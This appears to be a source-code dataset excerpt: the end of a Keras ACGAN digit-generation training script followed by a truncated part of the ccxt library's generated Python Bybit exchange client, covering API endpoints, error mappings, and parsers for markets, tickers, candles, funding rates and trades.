[noise, sampled_labels.reshape((-1, 1))], verbose=False)
X = np.concatenate((X_test, generated_images))
y = np.array([1] * nb_test + [0] * nb_test)
aux_y = np.concatenate((y_test, sampled_labels), axis=0)
# see if the discriminator can figure itself out...
discriminator_test_loss = discriminator.evaluate(
X, [y, aux_y], verbose=False)
discriminator_train_loss = np.mean(np.array(epoch_disc_loss), axis=0)
# make new noise
noise = np.random.uniform(-1, 1, (2 * nb_test, latent_size))
sampled_labels = np.random.randint(0, 10, 2 * nb_test)
trick = np.ones(2 * nb_test)
generator_test_loss = combined.evaluate(
[noise, sampled_labels.reshape((-1, 1))],
[trick, sampled_labels], verbose=False)
generator_train_loss = np.mean(np.array(epoch_gen_loss), axis=0)
# generate an epoch report on performance
train_history['generator'].append(generator_train_loss)
train_history['discriminator'].append(discriminator_train_loss)
test_history['generator'].append(generator_test_loss)
test_history['discriminator'].append(discriminator_test_loss)
print('{0:<22s} | {1:4s} | {2:15s} | {3:5s}'.format(
'component', *discriminator.metrics_names))
print('-' * 65)
ROW_FMT = '{0:<22s} | {1:<4.2f} | {2:<15.2f} | {3:<5.2f}'
print(ROW_FMT.format('generator (train)',
*train_history['generator'][-1]))
print(ROW_FMT.format('generator (test)',
*test_history['generator'][-1]))
print(ROW_FMT.format('discriminator (train)',
*train_history['discriminator'][-1]))
print(ROW_FMT.format('discriminator (test)',
*test_history['discriminator'][-1]))
# save weights every epoch
generator.save_weights(
'params_generator_epoch_{0:03d}.hdf5'.format(epoch), True)
discriminator.save_weights(
'params_discriminator_epoch_{0:03d}.hdf5'.format(epoch), True)
# generate some digits to display
noise = np.random.uniform(-1, 1, (100, latent_size))
sampled_labels = np.array([
[i] * 10 for i in range(10)
]).reshape(-1, 1)
# get a batch to display
generated_images = generator.predict(
[noise, sampled_labels], verbose=0)
# arrange them into a grid
img = (np.concatenate([r.reshape(-1, 28)
for r in np.split(generated_images, 10)
], axis=-1) * 127.5 + 127.5).astype(np.uint8)
Image.fromarray(img).save(
'plot_epoch_{0:03d}_generated.png'.format(epoch))
pickle.dump({'train': train_history, 'test': test_history},
open('acgan-history.pkl', 'wb'))
| [
"francois.chollet@gmail.com"
] | francois.chollet@gmail.com |
d39baaf0bedaa00c0a8c154389eab236dc99e1b8 | 12c2d7f9c3cd315ca822e2d2cfa253075139fcc2 | /python/ccxt/bybit.py | 2912438043f33ebdb72988166e8ba59b135af76d | [
"MIT"
] | permissive | bfrasure/ccxt | 9c85494626970fc9840790211df60534bb2ca5b4 | c81273f508fa238f1a8f0ea4bf8729c2a43f1461 | refs/heads/master | 2023-09-04T15:03:37.598303 | 2021-11-23T13:29:00 | 2021-11-23T13:29:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110,987 | py | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
# -----------------------------------------------------------------------------
try:
basestring # Python 3
except NameError:
basestring = str # Python 2
import json
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import PermissionDenied
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import BadRequest
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.errors import InvalidNonce
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class bybit(Exchange):
def describe(self):
return self.deep_extend(super(bybit, self).describe(), {
'id': 'bybit',
'name': 'Bybit',
'countries': ['VG'], # British Virgin Islands
'version': 'v2',
'userAgent': None,
'rateLimit': 100,
'hostname': 'bybit.com', # bybit.com, bytick.com
'has': {
'cancelAllOrders': True,
'cancelOrder': True,
'CORS': True,
'createOrder': True,
'editOrder': True,
'fetchBalance': True,
'fetchClosedOrders': True,
'fetchDeposits': True,
'fetchFundingRate': True,
'fetchFundingRateHistory': False,
'fetchIndexOHLCV': True,
'fetchLedger': True,
'fetchMarkets': True,
'fetchMarkOHLCV': True,
'fetchMyTrades': True,
'fetchOHLCV': True,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchOrderTrades': True,
'fetchPositions': True,
'fetchPremiumIndexOHLCV': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTime': True,
'fetchTrades': True,
'fetchTransactions': None,
'fetchWithdrawals': True,
'setMarginMode': True,
'setLeverage': True,
},
'timeframes': {
'1m': '1',
'3m': '3',
'5m': '5',
'15m': '15',
'30m': '30',
'1h': '60',
'2h': '120',
'4h': '240',
'6h': '360',
'12h': '720',
'1d': 'D',
'1w': 'W',
'1M': 'M',
'1y': 'Y',
},
'urls': {
'test': {
'spot': 'https://api-testnet.{hostname}',
'futures': 'https://api-testnet.{hostname}',
'v2': 'https://api-testnet.{hostname}',
'public': 'https://api-testnet.{hostname}',
'private': 'https://api-testnet.{hostname}',
},
'logo': 'https://user-images.githubusercontent.com/51840849/76547799-daff5b80-649e-11ea-87fb-3be9bac08954.jpg',
'api': {
'spot': 'https://api.{hostname}',
'futures': 'https://api.{hostname}',
'v2': 'https://api.{hostname}',
'public': 'https://api.{hostname}',
'private': 'https://api.{hostname}',
},
'www': 'https://www.bybit.com',
'doc': [
'https://bybit-exchange.github.io/docs/inverse/',
'https://bybit-exchange.github.io/docs/linear/',
'https://github.com/bybit-exchange',
],
'fees': 'https://help.bybit.com/hc/en-us/articles/360039261154',
'referral': 'https://www.bybit.com/app/register?ref=X7Prm',
},
'api': {
'spot': {
'public': {
'get': [
'symbols',
],
},
'quote': {
'get': [
'depth',
'depth/merged',
'trades',
'kline',
'ticker/24hr',
'ticker/price',
'ticker/book_ticker',
],
},
'private': {
'get': [
'order',
'open-orders',
'history-orders',
'myTrades',
'account',
'time',
],
'post': [
'order',
],
'delete': [
'order',
'order/fast',
],
},
'order': {
'delete': [
'batch-cancel',
'batch-fast-cancel',
'batch-cancel-by-ids',
],
},
},
'futures': {
'private': {
'get': [
'order/list',
'order',
'stop-order/list',
'stop-order',
'position/list',
'execution/list',
'trade/closed-pnl/list',
],
'post': [
'order/create',
'order/cancel',
'order/cancelAll',
'order/replace',
'stop-order/create',
'stop-order/cancel',
'stop-order/cancelAll',
'stop-order/replace',
'position/change-position-margin',
'position/trading-stop',
'position/leverage/save',
'position/switch-mode',
'position/switch-isolated',
'position/risk-limit',
],
},
},
'v2': {
'public': {
'get': [
'orderBook/L2',
'kline/list',
'tickers',
'trading-records',
'symbols',
'liq-records',
'mark-price-kline',
'index-price-kline',
'premium-index-kline',
'open-interest',
'big-deal',
'account-ratio',
'time',
'announcement',
'funding/prev-funding-rate',
'risk-limit/list',
],
},
'private': {
'get': [
'order/list',
'order',
'stop-order/list',
'stop-order',
'position/list',
'execution/list',
'trade/closed-pnl/list',
'funding/prev-funding-rate',
'funding/prev-funding',
'funding/predicted-funding',
'account/api-key',
'account/lcp',
'wallet/balance',
'wallet/fund/records',
'wallet/withdraw/list',
'exchange-order/list',
],
'post': [
'order/create',
'order/cancel',
'order/cancelAll',
'order/replace',
'stop-order/create',
'stop-order/cancel',
'stop-order/cancelAll',
'stop-order/replace',
'position/change-position-margin',
'position/trading-stop',
'position/leverage/save',
'position/switch-mode',
'position/switch-isolated',
'position/risk-limit',
],
},
},
'public': {
'linear': {
'get': [
'kline',
'recent-trading-records',
'funding/prev-funding-rate',
'mark-price-kline',
'index-price-kline',
'premium-index-kline',
'risk-limit',
],
},
},
'private': {
'linear': {
'get': [
'order/list',
'order/search',
'stop-order/list',
'stop-order/search',
'position/list',
'trade/execution/list',
'trade/closed-pnl/list',
'funding/predicted-funding',
'funding/prev-funding',
],
'post': [
'order/create',
'order/cancel',
'order/cancel-all',
'order/replace',
'stop-order/create',
'stop-order/cancel',
'stop-order/cancel-all',
'stop-order/replace',
'position/set-auto-add-margin',
'position/switch-isolated',
'tpsl/switch-mode',
'position/add-margin',
'position/set-leverage',
'position/trading-stop',
'position/set-risk',
],
},
},
},
'httpExceptions': {
'403': RateLimitExceeded, # Forbidden -- You request too many times
},
'exceptions': {
'exact': {
'-2015': AuthenticationError, # Invalid API-key, IP, or permissions for action.
'10001': BadRequest, # parameter error
'10002': InvalidNonce, # request expired, check your timestamp and recv_window
'10003': AuthenticationError, # Invalid apikey
'10004': AuthenticationError, # invalid sign
'10005': PermissionDenied, # permission denied for current apikey
'10006': RateLimitExceeded, # too many requests
'10007': AuthenticationError, # api_key not found in your request parameters
'10010': PermissionDenied, # request ip mismatch
'10017': BadRequest, # request path not found or request method is invalid
'10018': RateLimitExceeded, # exceed ip rate limit
'20001': OrderNotFound, # Order not exists
'20003': InvalidOrder, # missing parameter side
'20004': InvalidOrder, # invalid parameter side
'20005': InvalidOrder, # missing parameter symbol
'20006': InvalidOrder, # invalid parameter symbol
'20007': InvalidOrder, # missing parameter order_type
'20008': InvalidOrder, # invalid parameter order_type
'20009': InvalidOrder, # missing parameter qty
'20010': InvalidOrder, # qty must be greater than 0
'20011': InvalidOrder, # qty must be an integer
'20012': InvalidOrder, # qty must be greater than zero and less than 1 million
'20013': InvalidOrder, # missing parameter price
'20014': InvalidOrder, # price must be greater than 0
'20015': InvalidOrder, # missing parameter time_in_force
'20016': InvalidOrder, # invalid value for parameter time_in_force
'20017': InvalidOrder, # missing parameter order_id
'20018': InvalidOrder, # invalid date format
'20019': InvalidOrder, # missing parameter stop_px
'20020': InvalidOrder, # missing parameter base_price
'20021': InvalidOrder, # missing parameter stop_order_id
'20022': BadRequest, # missing parameter leverage
'20023': BadRequest, # leverage must be a number
'20031': BadRequest, # leverage must be greater than zero
'20070': BadRequest, # missing parameter margin
'20071': BadRequest, # margin must be greater than zero
'20084': BadRequest, # order_id or order_link_id is required
'30001': BadRequest, # order_link_id is repeated
'30003': InvalidOrder, # qty must be more than the minimum allowed
'30004': InvalidOrder, # qty must be less than the maximum allowed
'30005': InvalidOrder, # price exceeds maximum allowed
'30007': InvalidOrder, # price exceeds minimum allowed
'30008': InvalidOrder, # invalid order_type
'30009': ExchangeError, # no position found
'30010': InsufficientFunds, # insufficient wallet balance
'30011': PermissionDenied, # operation not allowed as position is undergoing liquidation
'30012': PermissionDenied, # operation not allowed as position is undergoing ADL
'30013': PermissionDenied, # position is in liq or adl status
'30014': InvalidOrder, # invalid closing order, qty should not greater than size
'30015': InvalidOrder, # invalid closing order, side should be opposite
'30016': ExchangeError, # TS and SL must be cancelled first while closing position
'30017': InvalidOrder, # estimated fill price cannot be lower than current Buy liq_price
'30018': InvalidOrder, # estimated fill price cannot be higher than current Sell liq_price
'30019': InvalidOrder, # cannot attach TP/SL params for non-zero position when placing non-opening position order
'30020': InvalidOrder, # position already has TP/SL params
'30021': InvalidOrder, # cannot afford estimated position_margin
'30022': InvalidOrder, # estimated buy liq_price cannot be higher than current mark_price
'30023': InvalidOrder, # estimated sell liq_price cannot be lower than current mark_price
'30024': InvalidOrder, # cannot set TP/SL/TS for zero-position
'30025': InvalidOrder, # trigger price should bigger than 10% of last price
'30026': InvalidOrder, # price too high
'30027': InvalidOrder, # price set for Take profit should be higher than Last Traded Price
'30028': InvalidOrder, # price set for Stop loss should be between Liquidation price and Last Traded Price
'30029': InvalidOrder, # price set for Stop loss should be between Last Traded Price and Liquidation price
'30030': InvalidOrder, # price set for Take profit should be lower than Last Traded Price
'30031': InsufficientFunds, # insufficient available balance for order cost
'30032': InvalidOrder, # order has been filled or cancelled
'30033': RateLimitExceeded, # The number of stop orders exceeds maximum limit allowed
'30034': OrderNotFound, # no order found
'30035': RateLimitExceeded, # too fast to cancel
'30036': ExchangeError, # the expected position value after order execution exceeds the current risk limit
'30037': InvalidOrder, # order already cancelled
'30041': ExchangeError, # no position found
'30042': InsufficientFunds, # insufficient wallet balance
'30043': InvalidOrder, # operation not allowed as position is undergoing liquidation
'30044': InvalidOrder, # operation not allowed as position is undergoing AD
'30045': InvalidOrder, # operation not allowed as position is not normal status
'30049': InsufficientFunds, # insufficient available balance
'30050': ExchangeError, # any adjustments made will trigger immediate liquidation
'30051': ExchangeError, # due to risk limit, cannot adjust leverage
'30052': ExchangeError, # leverage can not less than 1
'30054': ExchangeError, # position margin is invalid
'30057': ExchangeError, # requested quantity of contracts exceeds risk limit
'30063': ExchangeError, # reduce-only rule not satisfied
'30067': InsufficientFunds, # insufficient available balance
'30068': ExchangeError, # exit value must be positive
'30074': InvalidOrder, # can't create the stop order, because you expect the order will be triggered when the LastPrice(or IndexPrice、 MarkPrice, determined by trigger_by) is raising to stop_px, but the LastPrice(or IndexPrice、 MarkPrice) is already equal to or greater than stop_px, please adjust base_price or stop_px
'30075': InvalidOrder, # can't create the stop order, because you expect the order will be triggered when the LastPrice(or IndexPrice、 MarkPrice, determined by trigger_by) is falling to stop_px, but the LastPrice(or IndexPrice、 MarkPrice) is already equal to or less than stop_px, please adjust base_price or stop_px
'33004': AuthenticationError, # apikey already expired
'34026': ExchangeError, # the limit is no change
},
'broad': {
'unknown orderInfo': OrderNotFound, # {"ret_code":-1,"ret_msg":"unknown orderInfo","ext_code":"","ext_info":"","result":null,"time_now":"1584030414.005545","rate_limit_status":99,"rate_limit_reset_ms":1584030414003,"rate_limit":100}
'invalid api_key': AuthenticationError, # {"ret_code":10003,"ret_msg":"invalid api_key","ext_code":"","ext_info":"","result":null,"time_now":"1599547085.415797"}
},
},
'precisionMode': TICK_SIZE,
'options': {
'marketTypes': {
'BTC/USDT': 'linear',
'ETH/USDT': 'linear',
'BNB/USDT': 'linear',
'ADA/USDT': 'linear',
'DOGE/USDT': 'linear',
'XRP/USDT': 'linear',
'DOT/USDT': 'linear',
'UNI/USDT': 'linear',
'BCH/USDT': 'linear',
'LTC/USDT': 'linear',
'SOL/USDT': 'linear',
'LINK/USDT': 'linear',
'MATIC/USDT': 'linear',
'ETC/USDT': 'linear',
'FIL/USDT': 'linear',
'EOS/USDT': 'linear',
'AAVE/USDT': 'linear',
'XTZ/USDT': 'linear',
'SUSHI/USDT': 'linear',
'XEM/USDT': 'linear',
'BTC/USD': 'inverse',
'ETH/USD': 'inverse',
'EOS/USD': 'inverse',
'XRP/USD': 'inverse',
},
'defaultType': 'linear', # linear, inverse, futures
'code': 'BTC',
'cancelAllOrders': {
# 'method': 'v2PrivatePostOrderCancelAll', # v2PrivatePostStopOrderCancelAll
},
'recvWindow': 5 * 1000, # 5 sec default
'timeDifference': 0, # the difference between system clock and exchange server clock
'adjustForTimeDifference': False, # controls the adjustment logic upon instantiation
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'taker': 0.00075,
'maker': -0.00025,
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {},
},
},
})
def nonce(self):
return self.milliseconds() - self.options['timeDifference']
def load_time_difference(self, params={}):
serverTime = self.fetch_time(params)
after = self.milliseconds()
self.options['timeDifference'] = after - serverTime
return self.options['timeDifference']
def fetch_time(self, params={}):
response = self.v2PublicGetTime(params)
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: {},
# time_now: '1583933682.448826'
# }
#
return self.safe_timestamp(response, 'time_now')
def fetch_markets(self, params={}):
if self.options['adjustForTimeDifference']:
self.load_time_difference()
response = self.v2PublicGetSymbols(params)
#
# {
# "ret_code":0,
# "ret_msg":"OK",
# "ext_code":"",
# "ext_info":"",
# "result":[
# {
# "name":"BTCUSD",
# "alias":"BTCUSD",
# "status":"Trading",
# "base_currency":"BTC",
# "quote_currency":"USD",
# "price_scale":2,
# "taker_fee":"0.00075",
# "maker_fee":"-0.00025",
# "leverage_filter":{"min_leverage":1,"max_leverage":100,"leverage_step":"0.01"},
# "price_filter":{"min_price":"0.5","max_price":"999999.5","tick_size":"0.5"},
# "lot_size_filter":{"max_trading_qty":1000000,"min_trading_qty":1,"qty_step":1}
# },
# {
# "name":"BTCUSDT",
# "alias":"BTCUSDT",
# "status":"Trading",
# "base_currency":"BTC",
# "quote_currency":"USDT",
# "price_scale":2,
# "taker_fee":"0.00075",
# "maker_fee":"-0.00025",
# "leverage_filter":{"min_leverage":1,"max_leverage":100,"leverage_step":"0.01"},
# "price_filter":{"min_price":"0.5","max_price":"999999.5","tick_size":"0.5"},
# "lot_size_filter":{"max_trading_qty":100,"min_trading_qty":0.001,"qty_step":0.001}
# },
# ],
# "time_now":"1610539664.818033"
# }
#
markets = self.safe_value(response, 'result', [])
options = self.safe_value(self.options, 'fetchMarkets', {})
linearQuoteCurrencies = self.safe_value(options, 'linear', {'USDT': True})
result = []
for i in range(0, len(markets)):
market = markets[i]
id = self.safe_string_2(market, 'name', 'symbol')
baseId = self.safe_string(market, 'base_currency')
quoteId = self.safe_string(market, 'quote_currency')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
linear = (quote in linearQuoteCurrencies)
inverse = not linear
symbol = base + '/' + quote
baseQuote = base + quote
type = 'swap'
if baseQuote != id:
symbol = id
type = 'futures'
lotSizeFilter = self.safe_value(market, 'lot_size_filter', {})
priceFilter = self.safe_value(market, 'price_filter', {})
precision = {
'amount': self.safe_number(lotSizeFilter, 'qty_step'),
'price': self.safe_number(priceFilter, 'tick_size'),
}
leverage = self.safe_value(market, 'leverage_filter', {})
status = self.safe_string(market, 'status')
active = None
if status is not None:
active = (status == 'Trading')
spot = (type == 'spot')
swap = (type == 'swap')
futures = (type == 'futures')
option = (type == 'option')
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'active': active,
'precision': precision,
'taker': self.safe_number(market, 'taker_fee'),
'maker': self.safe_number(market, 'maker_fee'),
'type': type,
'spot': spot,
'swap': swap,
'futures': futures,
'option': option,
'linear': linear,
'inverse': inverse,
'limits': {
'amount': {
'min': self.safe_number(lotSizeFilter, 'min_trading_qty'),
'max': self.safe_number(lotSizeFilter, 'max_trading_qty'),
},
'price': {
'min': self.safe_number(priceFilter, 'min_price'),
'max': self.safe_number(priceFilter, 'max_price'),
},
'cost': {
'min': None,
'max': None,
},
'leverage': {
'max': self.safe_number(leverage, 'max_leverage', 1),
},
},
'info': market,
})
return result
def parse_ticker(self, ticker, market=None):
#
# fetchTicker
#
# {
# symbol: 'BTCUSD',
# bid_price: '7680',
# ask_price: '7680.5',
# last_price: '7680.00',
# last_tick_direction: 'MinusTick',
# prev_price_24h: '7870.50',
# price_24h_pcnt: '-0.024204',
# high_price_24h: '8035.00',
# low_price_24h: '7671.00',
# prev_price_1h: '7780.00',
# price_1h_pcnt: '-0.012853',
# mark_price: '7683.27',
# index_price: '7682.74',
# open_interest: 188829147,
# open_value: '23670.06',
# total_turnover: '25744224.90',
# turnover_24h: '102997.83',
# total_volume: 225448878806,
# volume_24h: 809919408,
# funding_rate: '0.0001',
# predicted_funding_rate: '0.0001',
# next_funding_time: '2020-03-12T00:00:00Z',
# countdown_hour: 7
# }
#
timestamp = None
marketId = self.safe_string(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market)
last = self.safe_number(ticker, 'last_price')
open = self.safe_number(ticker, 'prev_price_24h')
percentage = self.safe_number(ticker, 'price_24h_pcnt')
if percentage is not None:
percentage *= 100
change = None
average = None
if (last is not None) and (open is not None):
change = last - open
average = self.sum(open, last) / 2
baseVolume = self.safe_number(ticker, 'turnover_24h')
quoteVolume = self.safe_number(ticker, 'volume_24h')
vwap = self.vwap(baseVolume, quoteVolume)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high_price_24h'),
'low': self.safe_number(ticker, 'low_price_24h'),
'bid': self.safe_number(ticker, 'bid_price'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'ask_price'),
'askVolume': None,
'vwap': vwap,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': average,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.v2PublicGetTickers(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {
# symbol: 'BTCUSD',
# bid_price: '7680',
# ask_price: '7680.5',
# last_price: '7680.00',
# last_tick_direction: 'MinusTick',
# prev_price_24h: '7870.50',
# price_24h_pcnt: '-0.024204',
# high_price_24h: '8035.00',
# low_price_24h: '7671.00',
# prev_price_1h: '7780.00',
# price_1h_pcnt: '-0.012853',
# mark_price: '7683.27',
# index_price: '7682.74',
# open_interest: 188829147,
# open_value: '23670.06',
# total_turnover: '25744224.90',
# turnover_24h: '102997.83',
# total_volume: 225448878806,
# volume_24h: 809919408,
# funding_rate: '0.0001',
# predicted_funding_rate: '0.0001',
# next_funding_time: '2020-03-12T00:00:00Z',
# countdown_hour: 7
# }
# ],
# time_now: '1583948195.818255'
# }
#
result = self.safe_value(response, 'result', [])
first = self.safe_value(result, 0)
timestamp = self.safe_timestamp(response, 'time_now')
ticker = self.parse_ticker(first, market)
ticker['timestamp'] = timestamp
ticker['datetime'] = self.iso8601(timestamp)
return ticker
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.v2PublicGetTickers(params)
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {
# symbol: 'BTCUSD',
# bid_price: '7680',
# ask_price: '7680.5',
# last_price: '7680.00',
# last_tick_direction: 'MinusTick',
# prev_price_24h: '7870.50',
# price_24h_pcnt: '-0.024204',
# high_price_24h: '8035.00',
# low_price_24h: '7671.00',
# prev_price_1h: '7780.00',
# price_1h_pcnt: '-0.012853',
# mark_price: '7683.27',
# index_price: '7682.74',
# open_interest: 188829147,
# open_value: '23670.06',
# total_turnover: '25744224.90',
# turnover_24h: '102997.83',
# total_volume: 225448878806,
# volume_24h: 809919408,
# funding_rate: '0.0001',
# predicted_funding_rate: '0.0001',
# next_funding_time: '2020-03-12T00:00:00Z',
# countdown_hour: 7
# }
# ],
# time_now: '1583948195.818255'
# }
#
result = self.safe_value(response, 'result', [])
tickers = {}
for i in range(0, len(result)):
ticker = self.parse_ticker(result[i])
symbol = ticker['symbol']
tickers[symbol] = ticker
return self.filter_by_array(tickers, 'symbol', symbols)
def parse_ohlcv(self, ohlcv, market=None):
#
# inverse perpetual BTC/USD
#
# {
# symbol: 'BTCUSD',
# interval: '1',
# open_time: 1583952540,
# open: '7760.5',
# high: '7764',
# low: '7757',
# close: '7763.5',
# volume: '1259766',
# turnover: '162.32773718999994'
# }
#
# linear perpetual BTC/USDT
#
# {
# "id":143536,
# "symbol":"BTCUSDT",
# "period":"15",
# "start_at":1587883500,
# "volume":1.035,
# "open":7540.5,
# "high":7541,
# "low":7540.5,
# "close":7541
# }
#
return [
self.safe_timestamp_2(ohlcv, 'open_time', 'start_at'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number_2(ohlcv, 'turnover', 'volume'),
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
price = self.safe_string(params, 'price')
params = self.omit(params, 'price')
request = {
'symbol': market['id'],
'interval': self.timeframes[timeframe],
}
duration = self.parse_timeframe(timeframe)
now = self.seconds()
if since is None:
if limit is None:
raise ArgumentsRequired(self.id + ' fetchOHLCV() requires a since argument or a limit argument')
else:
request['from'] = now - limit * duration
else:
request['from'] = int(since / 1000)
if limit is not None:
request['limit'] = limit # max 200, default 200
method = 'v2PublicGetKlineList'
if price == 'mark':
method = 'v2PublicGetMarkPriceKline'
elif price == 'index':
method = 'v2PublicGetIndexPriceKline'
elif price == 'premiumIndex':
method = 'v2PublicGetPremiumIndexKline'
elif market['linear']:
method = 'publicLinearGetKline'
response = getattr(self, method)(self.extend(request, params))
#
# inverse perpetual BTC/USD
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {
# symbol: 'BTCUSD',
# interval: '1',
# open_time: 1583952540,
# open: '7760.5',
# high: '7764',
# low: '7757',
# close: '7763.5',
# volume: '1259766',
# turnover: '162.32773718999994'
# },
# ],
# time_now: '1583953082.397330'
# }
#
# linear perpetual BTC/USDT
#
# {
# "ret_code":0,
# "ret_msg":"OK",
# "ext_code":"",
# "ext_info":"",
# "result":[
# {
# "id":143536,
# "symbol":"BTCUSDT",
# "period":"15",
# "start_at":1587883500,
# "volume":1.035,
# "open":7540.5,
# "high":7541,
# "low":7540.5,
# "close":7541
# }
# ],
# "time_now":"1587884120.168077"
# }
#
result = self.safe_value(response, 'result', {})
return self.parse_ohlcvs(result, market, timeframe, since, limit)
def fetch_funding_rate(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
method = 'publicLinearGetFundingPrevFundingRate' if market['linear'] else 'v2PublicGetFundingPrevFundingRate'
response = getattr(self, method)(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "symbol": "BTCUSD",
# "funding_rate": "0.00010000",
# "funding_rate_timestamp": 1577433600
# },
# "ext_info": null,
# "time_now": "1577445586.446797",
# "rate_limit_status": 119,
# "rate_limit_reset_ms": 1577445586454,
# "rate_limit": 120
# }
#
result = self.safe_value(response, 'result')
nextFundingRate = self.safe_number(result, 'funding_rate')
previousFundingTime = self.safe_integer(result, 'funding_rate_timestamp') * 1000
nextFundingTime = previousFundingTime + (8 * 3600000)
currentTime = self.milliseconds()
return {
'info': result,
'symbol': symbol,
'markPrice': None,
'indexPrice': None,
'interestRate': None,
'estimatedSettlePrice': None,
'timestamp': currentTime,
'datetime': self.iso8601(currentTime),
'previousFundingRate': None,
'nextFundingRate': nextFundingRate,
'previousFundingTimestamp': previousFundingTime,
'nextFundingTimestamp': nextFundingTime,
'previousFundingDatetime': self.iso8601(previousFundingTime),
'nextFundingDatetime': self.iso8601(nextFundingTime),
}
def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if since is None and limit is None:
raise ArgumentsRequired(self.id + ' fetchIndexOHLCV() requires a since argument or a limit argument')
request = {
'price': 'index',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if since is None and limit is None:
raise ArgumentsRequired(self.id + ' fetchMarkOHLCV() requires a since argument or a limit argument')
request = {
'price': 'mark',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def fetch_premium_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if since is None and limit is None:
raise ArgumentsRequired(self.id + ' fetchPremiumIndexOHLCV() requires a since argument or a limit argument')
request = {
'price': 'premiumIndex',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# id: 43785688,
# symbol: 'BTCUSD',
# price: 7786,
# qty: 67,
# side: 'Sell',
# time: '2020-03-11T19:18:30.123Z'
# }
#
# fetchMyTrades, fetchOrderTrades(private)
#
# {
# "closed_size": 0,
# "cross_seq": 277136382,
# "exec_fee": "0.0000001",
# "exec_id": "256e5ef8-abfe-5772-971b-f944e15e0d68",
# "exec_price": "8178.5",
# "exec_qty": 1,
# # the docs say the exec_time field is "abandoned" now
# # the user should use "trade_time_ms"
# "exec_time": "1571676941.70682",
# "exec_type": "Trade", #Exec Type Enum
# "exec_value": "0.00012227",
# "fee_rate": "0.00075",
# "last_liquidity_ind": "RemovedLiquidity", #Liquidity Enum
# "leaves_qty": 0,
# "nth_fill": 2,
# "order_id": "7ad50cb1-9ad0-4f74-804b-d82a516e1029",
# "order_link_id": "",
# "order_price": "8178",
# "order_qty": 1,
# "order_type": "Market", #Order Type Enum
# "side": "Buy", #Side Enum
# "symbol": "BTCUSD", #Symbol Enum
# "user_id": 1,
# "trade_time_ms": 1577480599000
# }
#
id = self.safe_string_2(trade, 'id', 'exec_id')
marketId = self.safe_string(trade, 'symbol')
market = self.safe_market(marketId, market)
symbol = market['symbol']
amountString = self.safe_string_2(trade, 'qty', 'exec_qty')
priceString = self.safe_string_2(trade, 'exec_price', 'price')
cost = self.safe_number(trade, 'exec_value')
amount = self.parse_number(amountString)
price = self.parse_number(priceString)
if cost is None:
cost = self.parse_number(Precise.string_mul(priceString, amountString))
timestamp = self.parse8601(self.safe_string(trade, 'time'))
if timestamp is None:
timestamp = self.safe_integer(trade, 'trade_time_ms')
side = self.safe_string_lower(trade, 'side')
lastLiquidityInd = self.safe_string(trade, 'last_liquidity_ind')
takerOrMaker = 'maker' if (lastLiquidityInd == 'AddedLiquidity') else 'taker'
feeCost = self.safe_number(trade, 'exec_fee')
fee = None
if feeCost is not None:
feeCurrencyCode = market['base'] if market['inverse'] else market['quote']
fee = {
'cost': feeCost,
'currency': feeCurrencyCode,
'rate': self.safe_number(trade, 'fee_rate'),
}
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': self.safe_string(trade, 'order_id'),
'type': self.safe_string_lower(trade, 'order_type'),
'side': side,
'takerOrMaker': takerOrMaker,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
# 'from': 123, # from id
}
if limit is not None:
request['count'] = limit # default 500, max 1000
